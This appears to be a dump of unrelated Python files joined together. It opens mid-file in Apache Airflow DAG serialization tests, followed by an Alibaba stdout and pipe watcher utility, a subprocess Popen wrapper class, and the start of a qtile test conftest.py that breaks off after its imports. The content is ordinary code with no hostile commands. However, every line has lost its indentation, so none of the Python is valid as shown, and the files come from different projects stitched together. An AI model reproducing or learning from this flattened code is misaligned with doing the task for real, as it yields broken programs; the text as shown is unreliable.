datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.normalized_schedule_interval == expected_n_schedule_interval
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
        This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
        Assert that when an OperatorLink is neither registered via Plugins nor an inbuilt Operator Link,
        the DAG can still be deserialized (does not error) but an error is logged
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
        This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
        Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
        Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
        we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
        # The parameters we add manually in Serialization need to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
        This test verifies that no new fields have been added to BaseOperator, and serves as a
        reminder that serialization support and tests must be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
        Tests serialize_operator and makes sure the deps are in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
        Tests serialize_task_group and makes sure the lists are in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
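        # Containers with non-JSON-native members are encoded as {"__type": ..., "__var": ...};
        # unwrap the encoding before comparing against the expected output.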
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
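        # Simulate kubernetes not being installed: any absolute import of the
        # 'kubernetes' package raises ImportError, everything else imports normally.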
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
io_utils.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import threading
from queue import Queue
class StdoutWrapper(object):
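    # Tee-like wrapper: everything written goes to the original stdout and is also
    # pushed onto a queue so another thread can poll() the captured lines.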
def __init__(self, stdout, queue=None):
self._stdout_backup = stdout
if queue is None:
self._lines = Queue()
else:
self._lines = queue
@property
def stdout(self):
return self._stdout_backup
def write(self, line):
line = line.encode("ascii", "ignore").decode("ascii")
self._stdout_backup.write(line)
self._lines.put(line)
def flush(self):
self._stdout_backup.flush()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
class PipeWatcher(object):
def __init__(self, pipe, sink, queue=None, drop=True):
"""Watch a pipe, and buffer its output if drop is False."""
self._pipe = pipe
self._sink = sink
self._drop = drop
if queue is None:
self._lines = Queue()
else:
self._lines = queue
def read_and_poll(self):
for line in self._pipe:
try:
self._sink.write(line)
except: # noqa: E722
pass
try:
if not self._drop:
self._lines.put(line)
except: # noqa: E722
pass
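        # Read the pipe on a daemon thread so watching never blocks the caller.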
self._polling_thread = threading.Thread(target=read_and_poll, args=(self,))
self._polling_thread.daemon = True
self._polling_thread.start()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
def drop(self, drop=True):
self._drop = drop
|
process.py
|
import collections
import logging
import threading
import os
import sys
import signal
import platform
import subprocess
VERBOSE = True
class PopenProcess(object):
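    # Wraps subprocess.Popen: stdout (and optionally stderr) is read line by line on
    # daemon threads and each stripped line is handed to the corresponding callback.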
def __init__(self,
command,
read_line_callback,
read_error_callback = None,
proc_args = None,
ignore_cwd = False,
**kwargs
):
self.proc_args = proc_args
self.ignore_cwd = ignore_cwd
self.read_line_callback = read_line_callback
self._receiving_thread = threading.Thread(target=self._receiving_thread_target)
self._receiving_thread.daemon = True
self._stdin_lock = threading.Lock()
cwd = os.getcwd()
popen_args = {
"cwd": cwd,
"stdout": subprocess.PIPE,
"stdin": subprocess.PIPE,
"bufsize": 1, # Line buffering
"universal_newlines": True,
}
self._recerror_thread = None
self.read_error_callback = read_error_callback
        if self.read_error_callback is not None:
self._recerror_thread = threading.Thread(target=self._recerror_thread_target)
self._recerror_thread.daemon = True
popen_args["stderr"] = subprocess.PIPE
popen_args.update(kwargs)
cmdpath = os.path.join(cwd, command)
if self.ignore_cwd:
cmdpath = command
if VERBOSE:
print("popen", cmdpath, self.proc_args, popen_args)
else:
print("popen", cmdpath, self.proc_args)
if self.proc_args is None:
self.process = subprocess.Popen(cmdpath, **popen_args)
else:
self.process = subprocess.Popen([cmdpath] + self.proc_args, **popen_args)
if VERBOSE:
print("process opened")
self._receiving_thread.start()
if VERBOSE:
print("receiving thread started")
        if self._recerror_thread is not None:
self._recerror_thread.start()
if VERBOSE:
print("receiving error thread started")
def _receiving_thread_target(self):
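        # Read stdout until EOF, forwarding each stripped line to the callback,
        # then close the pipes and make sure the child process is reaped.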
while True:
line = self.process.stdout.readline()
if not line:
break
sline = line.rstrip()
self.read_line_callback(sline)
self.process.stdout.close()
with self._stdin_lock:
self.process.stdin.close()
if self.is_alive():
self.terminate()
self.wait_for_return_code()
def _recerror_thread_target(self):
while True:
line = self.process.stderr.readline()
if not line:
break
sline = line.rstrip()
self.read_error_callback(sline)
def is_alive(self):
return self.process.poll() is None
def terminate(self):
self.process.terminate()
def kill(self):
self.process.kill()
def send_line(self, string):
if VERBOSE:
print("sending line",string)
with self._stdin_lock:
self.process.stdin.write(string + "\n")
self.process.stdin.flush()
def wait_for_return_code(self):
self.process.wait()
return self.process.returncode
def pid(self):
return self.process.pid
def __repr__(self):
return "<PopenProcess at {0} (pid={1})>".format(hex(id(self)), self.pid())
|
conftest.py
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2014 Sean Vig
# Copyright (c) 2014-2015 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
import pytest
import xcffib
import xcffib.testing
import xcffib.xproto
import libqtile.config
from libqtile import command, ipc
from libqtile.backend.x11.core import Core
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
